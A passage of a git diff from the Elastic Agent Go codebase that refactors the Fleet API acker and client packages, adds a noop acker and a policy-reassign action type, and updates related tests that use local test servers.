struct{} + +func (testAgentInfo) AgentID() string { return "agent-secret" } + +func wrapStrToResp(code int, body string) *http.Response { + return &http.Response{ + Status: fmt.Sprintf("%d %s", code, http.StatusText(code)), + StatusCode: code, + Proto: "HTTP/1.1", + ProtoMajor: 1, + ProtoMinor: 1, + Body: ioutil.NopCloser(bytes.NewBufferString(body)), + ContentLength: int64(len(body)), + Header: make(http.Header), + } +} diff --git a/x-pack/elastic-agent/pkg/agent/application/lazy_acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker.go similarity index 71% rename from x-pack/elastic-agent/pkg/agent/application/lazy_acker.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker.go index 4a4004e028f..39f6fb5cd30 100644 --- a/x-pack/elastic-agent/pkg/agent/application/lazy_acker.go +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package lazy import ( "context" @@ -19,21 +19,24 @@ type ackForcer interface { ForceAck() } -type lazyAcker struct { +// Acker is a lazy acker which performs HTTP communication on commit. +type Acker struct { log *logger.Logger acker batchAcker queue []fleetapi.Action } -func newLazyAcker(baseAcker batchAcker, log *logger.Logger) *lazyAcker { - return &lazyAcker{ +// NewAcker creates a new lazy acker. +func NewAcker(baseAcker batchAcker, log *logger.Logger) *Acker { + return &Acker{ acker: baseAcker, queue: make([]fleetapi.Action, 0), log: log, } } -func (f *lazyAcker) Ack(ctx context.Context, action fleetapi.Action) error { +// Ack acknowledges action. +func (f *Acker) Ack(ctx context.Context, action fleetapi.Action) error { f.queue = append(f.queue, action) f.log.Debugf("appending action with id '%s' to the queue", action.ID()) @@ -44,7 +47,8 @@ func (f *lazyAcker) Ack(ctx context.Context, action fleetapi.Action) error { return nil } -func (f *lazyAcker) Commit(ctx context.Context) error { +// Commit commits ack actions. +func (f *Acker) Commit(ctx context.Context) error { err := f.acker.AckBatch(ctx, f.queue) if err != nil { // do not cleanup on error @@ -54,5 +58,3 @@ func (f *lazyAcker) Commit(ctx context.Context) error { f.queue = make([]fleetapi.Action, 0) return nil } - -var _ fleetAcker = &lazyAcker{} diff --git a/x-pack/elastic-agent/pkg/agent/application/lazy_acker_test.go b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker_test.go similarity index 64% rename from x-pack/elastic-agent/pkg/agent/application/lazy_acker_test.go rename to x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker_test.go index b3d872d4946..1e34d303bc5 100644 --- a/x-pack/elastic-agent/pkg/agent/application/lazy_acker_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/lazy/lazy_acker_test.go @@ -2,21 +2,26 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package lazy import ( + "bytes" "context" "encoding/json" + "fmt" "io" "io/ioutil" "net/http" + "net/url" "strings" + "sync" "testing" "github.com/stretchr/testify/assert" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/fleet" ) func TestLazyAcker(t *testing.T) { @@ -24,15 +29,15 @@ func TestLazyAcker(t *testing.T) { Events []fleetapi.AckEvent `json:"events"` } - log, _ := logger.New("") + log, _ := logger.New("", false) client := newTestingClient() agentInfo := &testAgentInfo{} - acker, err := newActionAcker(log, agentInfo, client) + acker, err := fleet.NewAcker(log, agentInfo, client) if err != nil { t.Fatal(err) } - lacker := newLazyAcker(acker, log) + lacker := NewAcker(acker, log) if acker == nil { t.Fatal("acker not initialized") @@ -122,3 +127,57 @@ func (a *actionImmediate) String() string { func (a *actionImmediate) OriginalType() string { return a.originalType } + +type clientCallbackFunc func(headers http.Header, body io.Reader) (*http.Response, error) + +type testingClient struct { + sync.Mutex + callback clientCallbackFunc + received chan struct{} +} + +func (t *testingClient) Send( + _ context.Context, + method string, + path string, + params url.Values, + headers http.Header, + body io.Reader, +) (*http.Response, error) { + t.Lock() + defer t.Unlock() + defer func() { t.received <- struct{}{} }() + return t.callback(headers, body) +} + +func (t *testingClient) URI() string { + return "http://localhost" +} + +func (t *testingClient) Answer(fn clientCallbackFunc) <-chan struct{} { + t.Lock() + defer t.Unlock() + t.callback = fn + return t.received +} + +func newTestingClient() *testingClient { + return &testingClient{received: make(chan struct{}, 1)} +} + +type testAgentInfo struct{} + +func (testAgentInfo) AgentID() string { return "agent-secret" } + +func wrapStrToResp(code int, body string) *http.Response { + return &http.Response{ + Status: fmt.Sprintf("%d %s", code, http.StatusText(code)), + StatusCode: code, + Proto: "HTTP/1.1", + ProtoMajor: 1, + ProtoMinor: 1, + Body: ioutil.NopCloser(bytes.NewBufferString(body)), + ContentLength: int64(len(body)), + Header: make(http.Header), + } +} diff --git a/x-pack/elastic-agent/pkg/fleetapi/acker/noop/noop_acker.go b/x-pack/elastic-agent/pkg/fleetapi/acker/noop/noop_acker.go new file mode 100644 index 00000000000..05b9ed5e9b5 --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/acker/noop/noop_acker.go @@ -0,0 +1,28 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package fleet + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// Acker is a noop acker. +// Methods of these acker do nothing. +type Acker struct{} + +// NewAcker creates a new noop acker. +func NewAcker() *Acker { + return &Acker{} +} + +// Ack acknowledges action. +func (f *Acker) Ack(ctx context.Context, action fleetapi.Action) error { + return nil +} + +// Commit commits ack actions. +func (*Acker) Commit(ctx context.Context) error { return nil } diff --git a/x-pack/elastic-agent/pkg/fleetapi/action.go b/x-pack/elastic-agent/pkg/fleetapi/action.go index d836aa801c2..9aabdd30371 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/action.go +++ b/x-pack/elastic-agent/pkg/fleetapi/action.go @@ -9,6 +9,8 @@ import ( "fmt" "strings" + "github.com/mitchellh/mapstructure" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" ) @@ -19,10 +21,12 @@ const ( ActionTypeUnenroll = "UNENROLL" // ActionTypePolicyChange specifies policy change action. ActionTypePolicyChange = "POLICY_CHANGE" + // ActionTypePolicyReassign specifies policy reassign action. + ActionTypePolicyReassign = "POLICY_REASSIGN" // ActionTypeSettings specifies change of agent settings. ActionTypeSettings = "SETTINGS" - // ActionTypeApplication specifies agent action. - ActionTypeApplication = "APP_ACTION" + // ActionTypeInputAction specifies agent action. + ActionTypeInputAction = "INPUT_ACTION" ) // Action base interface for all the implemented action from the fleet API. @@ -70,6 +74,31 @@ func (a *ActionUnknown) OriginalType() string { return a.originalType } +// ActionPolicyReassign is a request to apply a new +type ActionPolicyReassign struct { + ActionID string + ActionType string +} + +func (a *ActionPolicyReassign) String() string { + var s strings.Builder + s.WriteString("action_id: ") + s.WriteString(a.ActionID) + s.WriteString(", type: ") + s.WriteString(a.ActionType) + return s.String() +} + +// Type returns the type of the Action. +func (a *ActionPolicyReassign) Type() string { + return a.ActionType +} + +// ID returns the ID of the Action. +func (a *ActionPolicyReassign) ID() string { + return a.ActionID +} + // ActionPolicyChange is a request to apply a new type ActionPolicyChange struct { ActionID string @@ -179,10 +208,13 @@ func (a *ActionSettings) String() string { // ActionApp is the application action request. type ActionApp struct { - ActionID string - ActionType string - Application string - Data json.RawMessage + ActionID string `json:"id" mapstructure:"id"` + ActionType string `json:"type" mapstructure:"type"` + InputType string `json:"input_type" mapstructure:"input_type"` + Data json.RawMessage `json:"data" mapstructure:"data"` + StartedAt string `json:"started_at,omitempty" mapstructure:"started_at,omitempty"` + CompletedAt string `json:"completed_at,omitempty" mapstructure:"completed_at,omitempty"` + Error string `json:"error,omitempty" mapstructure:"error,omitempty"` } func (a *ActionApp) String() string { @@ -191,8 +223,8 @@ func (a *ActionApp) String() string { s.WriteString(a.ActionID) s.WriteString(", type: ") s.WriteString(a.ActionType) - s.WriteString(", application: ") - s.WriteString(a.Application) + s.WriteString(", input_type: ") + s.WriteString(a.InputType) return s.String() } @@ -206,19 +238,20 @@ func (a *ActionApp) Type() string { return a.ActionType } +// MarshalMap marshals ActionApp into a corresponding map +func (a *ActionApp) MarshalMap() (map[string]interface{}, error) { + var res map[string]interface{} + err := mapstructure.Decode(a, &res) + return res, err +} + // Actions is a list of Actions to executes and allow to unmarshal heterogenous action type. type Actions []Action // UnmarshalJSON takes every raw representation of an action and try to decode them. func (a *Actions) UnmarshalJSON(data []byte) error { - type r struct { - ActionType string `json:"type"` - Application string `json:"application"` - ActionID string `json:"id"` - Data json.RawMessage `json:"data"` - } - var responses []r + var responses []ActionApp if err := json.Unmarshal(data, &responses); err != nil { return errors.New(err, @@ -241,12 +274,17 @@ func (a *Actions) UnmarshalJSON(data []byte) error { "fail to decode POLICY_CHANGE action", errors.TypeConfig) } - case ActionTypeApplication: + case ActionTypePolicyReassign: + action = &ActionPolicyReassign{ + ActionID: response.ActionID, + ActionType: response.ActionType, + } + case ActionTypeInputAction: action = &ActionApp{ - ActionID: response.ActionID, - ActionType: response.ActionType, - Application: response.Application, - Data: response.Data, + ActionID: response.ActionID, + ActionType: response.ActionType, + InputType: response.InputType, + Data: response.Data, } case ActionTypeUnenroll: action = &ActionUnenroll{ diff --git a/x-pack/elastic-agent/pkg/fleetapi/action_test.go b/x-pack/elastic-agent/pkg/fleetapi/action_test.go new file mode 100644 index 00000000000..28e439699a7 --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/action_test.go @@ -0,0 +1,82 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package fleetapi + +import ( + "encoding/json" + "testing" + + "github.com/google/go-cmp/cmp" +) + +func TestActionSerialization(t *testing.T) { + a := ActionApp{ + ActionID: "1231232", + ActionType: "APP_INPUT", + InputType: "osquery", + Data: []byte(`{ "foo": "bar" }`), + } + + m, err := a.MarshalMap() + if err != nil { + t.Fatal(err) + } + + diff := cmp.Diff(4, len(m)) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.ActionID, mapStringVal(m, "id")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.ActionType, mapStringVal(m, "type")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.InputType, mapStringVal(m, "input_type")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.Data, mapRawMessageVal(m, "data")) + if diff != "" { + t.Error(diff) + } + + diff = cmp.Diff(a.StartedAt, mapStringVal(m, "started_at")) + if diff != "" { + t.Error(diff) + } + diff = cmp.Diff(a.CompletedAt, mapStringVal(m, "completed_at")) + if diff != "" { + t.Error(diff) + } + diff = cmp.Diff(a.Error, mapStringVal(m, "error")) + if diff != "" { + t.Error(diff) + } +} + +func mapStringVal(m map[string]interface{}, key string) string { + if v, ok := m[key]; ok { + if s, ok := v.(string); ok { + return s + } + } + return "" +} + +func mapRawMessageVal(m map[string]interface{}, key string) json.RawMessage { + if v, ok := m[key]; ok { + if res, ok := v.(json.RawMessage); ok { + return res + } + } + return nil +} diff --git a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go index 79bcb39d40b..82f88573e65 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go +++ b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd.go @@ -15,6 +15,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const checkingPath = "/api/fleet/agents/%s/checkin" @@ -61,7 +62,7 @@ func (e *CheckinResponse) Validate() error { // CheckinCmd is a fleet API command. type CheckinCmd struct { - client clienter + client client.Sender info agentInfo } @@ -70,7 +71,7 @@ type agentInfo interface { } // NewCheckinCmd creates a new api command. -func NewCheckinCmd(info agentInfo, client clienter) *CheckinCmd { +func NewCheckinCmd(info agentInfo, client client.Sender) *CheckinCmd { return &CheckinCmd{ client: client, info: info, @@ -101,7 +102,7 @@ func (e *CheckinCmd) Execute(ctx context.Context, r *CheckinRequest) (*CheckinRe defer resp.Body.Close() if resp.StatusCode != http.StatusOK { - return nil, extract(resp.Body) + return nil, client.ExtractError(resp.Body) } rs, _ := ioutil.ReadAll(resp.Body) diff --git a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go index 3e88ed29cd1..86cc814e882 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/checkin_cmd_test.go @@ -16,6 +16,7 @@ import ( "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) type agentinfo struct{} @@ -37,11 +38,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusInternalServerError) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -86,11 +87,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -147,11 +148,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -179,11 +180,11 @@ func TestCheckin(t *testing.T) { path := fmt.Sprintf("/api/fleet/agents/%s/checkin", agentInfo.AgentID()) mux.HandleFunc(path, authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} @@ -213,11 +214,11 @@ func TestCheckin(t *testing.T) { assert.Equal(t, "linux", req.Metadata.OS.Name) w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{Metadata: testMetadata()} @@ -247,11 +248,11 @@ func TestCheckin(t *testing.T) { assert.Nil(t, req.Metadata) w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, raw) + fmt.Fprint(w, raw) }, withAPIKey)) return mux }, withAPIKey, - func(t *testing.T, client clienter) { + func(t *testing.T, client client.Sender) { cmd := NewCheckinCmd(agentInfo, client) request := CheckinRequest{} diff --git a/x-pack/elastic-agent/pkg/fleetapi/client.go b/x-pack/elastic-agent/pkg/fleetapi/client/client.go similarity index 89% rename from x-pack/elastic-agent/pkg/fleetapi/client.go rename to x-pack/elastic-agent/pkg/fleetapi/client/client.go index c78b0d8ee13..8f9fcd7bc98 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/client.go +++ b/x-pack/elastic-agent/pkg/fleetapi/client/client.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package fleetapi +package client import ( "context" @@ -21,7 +21,8 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) -type clienter interface { +// Sender is an sender interface describing client behavior. +type Sender interface { Send( ctx context.Context, method string, @@ -30,6 +31,8 @@ type clienter interface { headers http.Header, body io.Reader, ) (*http.Response, error) + + URI() string } var baseRoundTrippers = func(rt http.RoundTripper) (http.RoundTripper, error) { @@ -47,7 +50,7 @@ func init() { return nil, err } - l, err := logger.New("fleet_client") + l, err := logger.New("fleet_client", false) if err != nil { return nil, errors.New(err, "could not create the logger for debugging HTTP request") } @@ -88,7 +91,8 @@ func NewWithConfig(log *logger.Logger, cfg *kibana.Config) (*kibana.Client, erro return kibana.NewWithConfig(log, cfg, baseRoundTrippers) } -func extract(resp io.Reader) error { +// ExtractError extracts error from a fleet response +func ExtractError(resp io.Reader) error { // Lets try to extract a high level Kibana error. e := &struct { StatusCode int `json:"statusCode"` @@ -106,10 +110,10 @@ func extract(resp io.Reader) error { // System errors doesn't return a message, fleet code can return a Message key which has more // information. if len(e.Message) == 0 { - return fmt.Errorf("Status code: %d, Kibana returned an error: %s", e.StatusCode, e.Error) + return fmt.Errorf("status code: %d, Kibana returned an error: %s", e.StatusCode, e.Error) } return fmt.Errorf( - "Status code: %d, Kibana returned an error: %s, message: %s", + "status code: %d, Kibana returned an error: %s, message: %s", e.StatusCode, e.Error, e.Message, diff --git a/x-pack/elastic-agent/pkg/fleetapi/client_test.go b/x-pack/elastic-agent/pkg/fleetapi/client/client_test.go similarity index 90% rename from x-pack/elastic-agent/pkg/fleetapi/client_test.go rename to x-pack/elastic-agent/pkg/fleetapi/client/client_test.go index 416ff9dcc49..098a314af2a 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/client_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/client/client_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package fleetapi +package client import ( "context" @@ -29,7 +29,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "abc123")) return mux }, func(t *testing.T, host string) { @@ -58,7 +58,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "secret")) return mux }, func(t *testing.T, host string) { @@ -82,7 +82,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) require.Equal(t, r.Header.Get("User-Agent"), "Elastic Agent v8.0.0") }) return mux @@ -116,6 +116,7 @@ func TestHTTPClient(t *testing.T) { client, err := kibana.NewWithRawConfig(nil, cfg, func(wrapped http.RoundTripper) (http.RoundTripper, error) { return NewFleetAuthRoundTripper(wrapped, "abc123") }) + require.NoError(t, err) _, err = client.Send(timeoutCtx, "GET", "/echo-hello", nil, nil, nil) require.Error(t, err) @@ -129,18 +130,18 @@ func TestExtract(t *testing.T) { // The error before is returned when an exception or an internal occur in Kibana, they // are not only generated by the Fleet app. t.Run("standard high level kibana errors", func(t *testing.T) { - err := extract(strings.NewReader(`{ "statusCode": 500, "Internal Server Error"}`)) + err := ExtractError(strings.NewReader(`{ "statusCode": 500, "Internal Server Error"}`)) assert.True(t, strings.Index(err.Error(), "500") > 0) assert.True(t, strings.Index(err.Error(), "Internal Server Error") > 0) }) t.Run("proxy or non json response", func(t *testing.T) { - err := extract(strings.NewReader("Bad Request")) + err := ExtractError(strings.NewReader("Bad Request")) assert.True(t, strings.Index(err.Error(), "Bad Request") > 0) }) t.Run("Fleet generated errors", func(t *testing.T) { - err := extract(strings.NewReader(`{"statusCode":400,"error":"Bad Request","message":"child \"metadata\" fails because [\"cal\" is not allowed]","validation":{"source":"payload","keys":["metadata.cal"]}}`)) + err := ExtractError(strings.NewReader(`{"statusCode":400,"error":"Bad Request","message":"child \"metadata\" fails because [\"cal\" is not allowed]","validation":{"source":"payload","keys":["metadata.cal"]}}`)) assert.True(t, strings.Index(err.Error(), "400") > 0) assert.True(t, strings.Index(err.Error(), "Bad Request") > 0) assert.True(t, strings.Index(err.Error(), "fails because") > 0) diff --git a/x-pack/elastic-agent/pkg/fleetapi/client/helper_test.go b/x-pack/elastic-agent/pkg/fleetapi/client/helper_test.go new file mode 100644 index 00000000000..fce400ef067 --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/client/helper_test.go @@ -0,0 +1,34 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package client + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" +) + +func authHandler(handler http.HandlerFunc, apiKey string) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + const key = "Authorization" + const prefix = "ApiKey " + + v := strings.TrimPrefix(r.Header.Get(key), prefix) + if v != apiKey { + http.Error(w, "Unauthorized", http.StatusUnauthorized) + return + } + handler(w, r) + } +} + +func withServer(m func(t *testing.T) *http.ServeMux, test func(t *testing.T, host string)) func(t *testing.T) { + return func(t *testing.T) { + s := httptest.NewServer(m(t)) + defer s.Close() + test(t, s.Listener.Addr().String()) + } +} diff --git a/x-pack/elastic-agent/pkg/fleetapi/round_trippers.go b/x-pack/elastic-agent/pkg/fleetapi/client/round_trippers.go similarity index 97% rename from x-pack/elastic-agent/pkg/fleetapi/round_trippers.go rename to x-pack/elastic-agent/pkg/fleetapi/client/round_trippers.go index d40da3bccdc..a0c4c04e068 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/round_trippers.go +++ b/x-pack/elastic-agent/pkg/fleetapi/client/round_trippers.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package fleetapi +package client import ( "errors" @@ -16,8 +16,7 @@ var ErrInvalidAPIKey = errors.New("invalid api key to authenticate with fleet") // FleetUserAgentRoundTripper adds the Fleet user agent. type FleetUserAgentRoundTripper struct { - rt http.RoundTripper - version string + rt http.RoundTripper } // RoundTrip adds the Fleet user agent string to every request. diff --git a/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go b/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go index fc3949799a2..3b8db6e4a63 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go +++ b/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go @@ -18,6 +18,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) // EnrollType is the type of enrollment to do with the elastic-agent. @@ -168,7 +169,7 @@ func (e *EnrollResponse) Validate() error { // EnrollCmd is the command to be executed to enroll an elastic-agent into Fleet. type EnrollCmd struct { - client clienter + client client.Sender } // Execute enroll the Agent in the Fleet. @@ -210,7 +211,7 @@ func (e *EnrollCmd) Execute(ctx context.Context, r *EnrollRequest) (*EnrollRespo } if resp.StatusCode != http.StatusOK { - return nil, extract(resp.Body) + return nil, client.ExtractError(resp.Body) } enrollResponse := &EnrollResponse{} @@ -227,6 +228,6 @@ func (e *EnrollCmd) Execute(ctx context.Context, r *EnrollRequest) (*EnrollRespo } // NewEnrollCmd creates a new EnrollCmd. -func NewEnrollCmd(client clienter) *EnrollCmd { +func NewEnrollCmd(client client.Sender) *EnrollCmd { return &EnrollCmd{client: client} } diff --git a/x-pack/elastic-agent/pkg/fleetapi/helper_test.go b/x-pack/elastic-agent/pkg/fleetapi/helper_test.go index 85f66e747ca..4650eb5c4ff 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/helper_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/helper_test.go @@ -13,6 +13,7 @@ import ( "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" ) @@ -41,16 +42,16 @@ func withServer(m func(t *testing.T) *http.ServeMux, test func(t *testing.T, hos func withServerWithAuthClient( m func(t *testing.T) *http.ServeMux, apiKey string, - test func(t *testing.T, client clienter), + test func(t *testing.T, client client.Sender), ) func(t *testing.T) { return withServer(m, func(t *testing.T, host string) { - log, _ := logger.New("") + log, _ := logger.New("", false) cfg := &kibana.Config{ Host: host, } - client, err := NewAuthWithConfig(log, apiKey, cfg) + client, err := client.NewAuthWithConfig(log, apiKey, cfg) require.NoError(t, err) test(t, client) }) diff --git a/x-pack/elastic-agent/pkg/kibana/client.go b/x-pack/elastic-agent/pkg/kibana/client.go index 083aa8d0d83..24be2e7f05e 100644 --- a/x-pack/elastic-agent/pkg/kibana/client.go +++ b/x-pack/elastic-agent/pkg/kibana/client.go @@ -79,7 +79,7 @@ func NewConfigFromURL(kURL string) (*Config, error) { func NewWithRawConfig(log *logger.Logger, config *config.Config, wrapper wrapperFunc) (*Client, error) { l := log if l == nil { - log, err := logger.New("kibana_client") + log, err := logger.New("kibana_client", false) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/kibana/client_test.go b/x-pack/elastic-agent/pkg/kibana/client_test.go index 36d24b88a00..7dff58ffb6f 100644 --- a/x-pack/elastic-agent/pkg/kibana/client_test.go +++ b/x-pack/elastic-agent/pkg/kibana/client_test.go @@ -35,7 +35,7 @@ func addCatchAll(mux *http.ServeMux, t *testing.T) *http.ServeMux { } func TestPortDefaults(t *testing.T) { - l, err := logger.New("") + l, err := logger.New("", false) require.NoError(t, err) testCases := []struct { @@ -70,7 +70,7 @@ func TestPortDefaults(t *testing.T) { // - Prefix. func TestHTTPClient(t *testing.T) { ctx := context.Background() - l, err := logger.New("") + l, err := logger.New("", false) require.NoError(t, err) t.Run("Guard against double slashes on path", withServer( @@ -79,7 +79,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/nested/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return addCatchAll(mux, t) }, func(t *testing.T, host string) { @@ -88,9 +88,11 @@ func TestHTTPClient(t *testing.T) { url := "http://" + host + "/" c, err := NewConfigFromURL(url) - client, err := NewWithConfig(l, c, noopWrapper) + require.NoError(t, err) + client, err := NewWithConfig(l, c, noopWrapper) require.NoError(t, err) + resp, err := client.Send(ctx, "GET", "/nested/echo-hello", nil, nil, nil) require.NoError(t, err) @@ -107,7 +109,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return mux }, func(t *testing.T, host string) { @@ -133,7 +135,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/mycustompath/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return mux }, func(t *testing.T, host string) { @@ -160,7 +162,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", basicAuthHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "hello", "world", "testing")) return mux }, func(t *testing.T, host string) { @@ -188,7 +190,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", basicAuthHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "hello", "world", "testing")) return mux }, func(t *testing.T, host string) { @@ -212,7 +214,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) require.Equal(t, r.Header.Get("User-Agent"), "custom-agent") }) return mux @@ -242,7 +244,7 @@ func 